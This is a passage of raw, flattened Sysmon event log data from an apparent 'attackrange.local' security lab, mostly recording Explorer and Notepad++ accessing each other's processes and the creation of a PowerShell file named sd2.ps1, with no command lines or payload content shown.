Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001047449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.902{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnk2021-07-12 07:48:31.902 10341000x80000000000000001047448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\windows.storage.dll+3c720e|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\windows.storage.dll+3c720e|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\windows.storage.dll+3c720e|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.storage.dll+3ca38e|C:\Windows\System32\windows.storage.dll+3c603f|C:\Windows\System32\windows.storage.dll+3c7180|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+3c78d8|C:\Windows\System32\windows.storage.dll+3cbeef|C:\Windows\System32\COMDLG32.dll+d92b|C:\Windows\System32\COMDLG32.dll+d6ae|C:\Windows\System32\COMDLG32.dll+12618|C:\Windows\System32\COMDLG32.dll+1a2f9|C:\Windows\System32\SHELL32.dll+14064c|C:\Windows\System32\SHELL32.dll+105193|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+14a655|C:\Windows\System32\SHELL32.dll+13d653|C:\Windows\System32\SHLWAPI.dll+a3de|C:\Windows\System32\COMDLG32.dll+21b5d|C:\Windows\System32\USER32.dll+23a42|C:\Windows\System32\USER32.dll+1f839|C:\Windows\System32\USER32.dll+1f7b6 10341000x80000000000000001047443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c78bc|C:\Windows\System32\windows.storage.dll+3cbeef|C:\Windows\System32\COMDLG32.dll+d92b|C:\Windows\System32\COMDLG32.dll+d6ae|C:\Windows\System32\COMDLG32.dll+12618|C:\Windows\System32\COMDLG32.dll+1a2f9|C:\Windows\System32\SHELL32.dll+14064c|C:\Windows\System32\SHELL32.dll+105193|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+14a655|C:\Windows\System32\SHELL32.dll+13d653|C:\Windows\System32\SHLWAPI.dll+a3de 10341000x80000000000000001047442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c78bc|C:\Windows\System32\windows.storage.dll+3cbeef|C:\Windows\System32\COMDLG32.dll+d92b|C:\Windows\System32\COMDLG32.dll+d6ae|C:\Windows\System32\COMDLG32.dll+12618|C:\Windows\System32\COMDLG32.dll+1a2f9|C:\Windows\System32\SHELL32.dll+14064c|C:\Windows\System32\SHELL32.dll+105193|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+14a655|C:\Windows\System32\SHELL32.dll+13d653|C:\Windows\System32\SHLWAPI.dll+a3de|C:\Windows\System32\COMDLG32.dll+21b5d 11241100x80000000000000001047441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.886{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd2.ps12021-07-12 07:48:31.886 23542300x80000000000000001047440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.037{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D81D820C1E18117A4864BD070806F35,SHA256=FF8EAEA99FB59AE8313CE5B8616C92CB7A333CB578E41B52A7B3C867E0C9F11B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806924Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:32.785{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43431F8BEE59D97236AF8A6616151604,SHA256=6CC33134B739814DD4CE6997F7804D4DC45662B6E3907D52BF35A3B32A6C4828,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.170{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F39BDFEB33C633BB46ED5479B22AA819,SHA256=ACEC3CC742639A7303AA60873BA02E67678DCC45A9F4B024AB9574D6DAD704C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.138{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\new 1@2021-07-12_074744MD5=13F64474E1704F5DD848BB968A1CA87C,SHA256=9D9D45D8070CB6B799B711375A182A8B4695DE1E55B5B2C2C1F0DD972BEF7ACC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.136{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1139CFC48B03BED3D70752E2B9978E50,SHA256=122FFFBDC4A76E8D80EAC94E46BC0B0BA6E12FD729137DE3E1EE1953591C02A3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001047525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.103{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd2.ps12021-07-12 07:48:31.886 10341000x80000000000000001047524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.017{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:32.001{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 